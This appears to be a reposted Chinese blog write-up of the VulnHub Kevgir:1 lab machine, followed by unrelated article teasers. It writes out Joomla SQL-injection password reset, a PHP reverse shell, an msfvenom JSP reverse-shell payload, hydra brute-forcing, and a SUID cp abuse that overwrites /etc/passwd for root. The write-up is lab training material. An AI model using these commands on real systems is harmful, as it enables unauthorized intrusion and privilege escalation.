[vulnhub]Kevgir: 1-Writeup_kevgir: 1靶机_Vicl1fe的博客-程序员资料

技术标签： vulnhub

个人博客地址

http://www.darkerbox.com

欢迎大家学习交流

靶机网址：

https://www.vulnhub.com/entry/kevgir-1,137/

靶机知识点：

靶机IP：192.168.34.170
kali IP：192.168.34.80

信息收集

nmap -sV -p- 192.168.34.170

在这里插入图片描述
端口有点多。
有4个http服务：80,8080,8081,9000，

80:
在这里插入图片描述
8080：tomcat

8081：Joom

在这里插入图片描述
9000：

有四个漏洞。

先写第一个

8081端口

joomscan -u http://192.168.34.170:8081/

在这里插入图片描述

扫出很多CVE。有网址，看看。我用的下图这个CVE。

在这里插入图片描述

https://www.exploit-db.com/exploits/6234

网址下面有例子，

在这里插入图片描述

漏洞利用

方式一

访问：http://192.168.34.170:8081/index.php?option=com_user&view=reset&layout=confirm

在这里插入图片描述

输入一个单引号，点击提交

在这里插入图片描述
跳转到重置密码页面。我修改密码为123456

重置密码后，
访问：http://192.168.34.170:8081/administrator/

在这里插入图片描述
登录

在这里插入图片描述

成功登录，寻找可以反弹shell的地方

添加了一个文章，但找了半天也没找见路径
在这里插入图片描述

然后看wp才找见这个地方。

在这里插入图片描述
点击beez。edit-html。

这里提示了路径

在这里插入图片描述

修为文件内容反弹shell。我用的kali下的/usr/share/webshells/php/php-reverse-shell.php，修改$Ip为kali ip

在这里插入图片描述
应用保存一下

访问这个页面

得到shell

在这里插入图片描述

方式二

nikto扫8080端口

nikto -h http://192.168.34.170:8080

在这里插入图片描述
有tomcat弱口令tomcat:tomcat，并找到管理页

在这里插入图片描述
有上传war文件的地方。

在这里插入图片描述

使用msfvenom生成war格式的payload。

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.34.80 LPORT=6666 -f war>r_jsp_shell_6666.war

上传文件
在这里插入图片描述
访问

方式三

hydra爆破ftp的用户名密码，用户名用的是seclists，密码用的是密码，我将密码放到了seclists/Passwords/下面。

hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/passwords_john.txt 192.168.34.170 ftp -s 25

在这里插入图片描述
几分钟爆出了账号和密码

ssh远程连接即可。

权限提升

这里是针对方式一反弹的shell。其他没有尝试

先反弹个tty。

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

找sudi权限的文件

find / -perm -u=s 2>/dev/null

发现有cp命令。

在这里插入图片描述
使用cp命令将/etc/shadow文件复制到/tmp下面就可以查看shadow文件了
在shadow中发现了两个用户

在这里插入图片描述
将admin用户复制到kali里。

admin:$6$mf3G6MUz$/si.Yp0SgJH/D4WQRC2lyRAaFKUqeHzC3ZbL7ENrCR2lCNibr0d8V0y03JFEnymP8MZzBi3m6mvaeeUmyySve/:16834:0:99999:7

使用john爆破：

在这里插入图片描述

爆出密码是admin。
但是我们并没有获取root权限。

我在kali创建了一个用户admin，并修改/etc/passwd文件，将uid和gid修改为.

在这里插入图片描述
kali使用python搭建简易服务器，默认是8000端口

cd /etc
python3 -m http.server

靶机下载

cd /tmp
wget http://192.168.34.80:8000/passwd

在这里插入图片描述

cp passwd /etc/passwd
su admin

得到root权限
在这里插入图片描述

欢迎大家一起学习交流，共同进步，欢迎加入信息安全小白群

在这里插入图片描述

本文链接：https://blog.csdn.net/qq_41918771/article/details/103725874

原作者删帖不实内容删帖广告或垃圾文章投诉

智能推荐

Apache Log4j2远程代码执行漏洞复现_1+!的博客-程序员资料

漏洞原理log4j2版本 < log4j-2.15.0-rc2 可由JNDI注入实现远程代码执行。影响版本Log4j2.x<=2.14.1漏洞复现漏洞分析的可以参考逐日实验室的这篇：https://mp.weixin.qq.com/s/l7iclJRegADs3oiEdcgAvQ准备环境把受影响的jar包拖进随手创建的一个java项目，这里部署jar包步骤就不写了，网上一搜傻瓜式教程都有。攻击机环境搭建，这里我用的vps（师兄的，因为我的是Windows。）jdk版本最好&

mysql-8.0.16安装笔记_我是何平的博客-程序员资料

文章目录1 网站资源2 前言3 Windows安装3.1免安装版本安装步骤1：点击 [windows 免安装版：https://dev.mysql.com/downloads/mysql/](https://dev.mysql.com/downloads/mysql/)步骤2：下载压缩包步骤3：解压 mysql-8.0.16-winx64.zip，放在 D:\Program Files\mysql...

瞬间高逼格！这 6 种 Python 进度条真的绝了！_我爱Python数据挖掘的博客-程序员资料

嗨！朋友，我是沐沐欢迎你来到学习python的宝藏基地~~长按下方二维码可以添加我为好友哦相信大家对进度条一定不陌生了，比如在我们安装python库的时候可以看到下载的进度，此外在下载文件时也可以看到类似的进度条，比如下图这种：应用场景：下载文件、任务计时等今天辰哥就给大家分享Python的6种不同的实现实时显示处理进度的方式，文中每一种方式都附带一个案例，并提供官方文档，供大家学习，自定义去修改。第1种：普通进度条利用打印功能print进行实时刷新显示for i in ran

Sublimerge 3手动安装简明教程_sublimerge下载_willing·Lin的博客-程序员资料

1、下载地址：https://www.sublimerge.com/sm3/docs/quick-start.html#installation2、将下载的文件放在Sublime Text 3安装目录下：..\Sublime Text 3\Packages\3、重启Sublime Text 3，鼠标右键菜单栏有Sublimerge选项。...

JUnit设计模式分析_xiaoqiang的博客-程序员资料

http://www.uml.org.cn/sjms/200442724.htm这篇文章由grid liu发表在grid liu在IT先锋中担任资深顾问，负责J2EE技术的顾问咨询和培训工作。摘要 JUnit是一个优秀的Java单元测试框架，由两位世界级软件大师Erich Gamma 和 Kent Beck共同开发完成。本文将向读者介绍

微信小程序项目开发实践_不要在定义于 app() 内的函数中_万少博的博客-程序员资料

最近更新时间：2017年7月5日17:25:46 现在的前端工程师职责越来越重要，很多新的技术都是从前端领域分离出来，微信小程序就是一个很好的前端技术的实践。开发微信小程序前，总觉得神秘面纱不可及，但经过前端团队一个月辛苦奋战，微信小程序从此不再陌生，而变得熟悉和可控。现在，小程序终于上线了，我也终于有时间来分享一下开发过程中遇到的问题。0、开发过程中需要遵守的两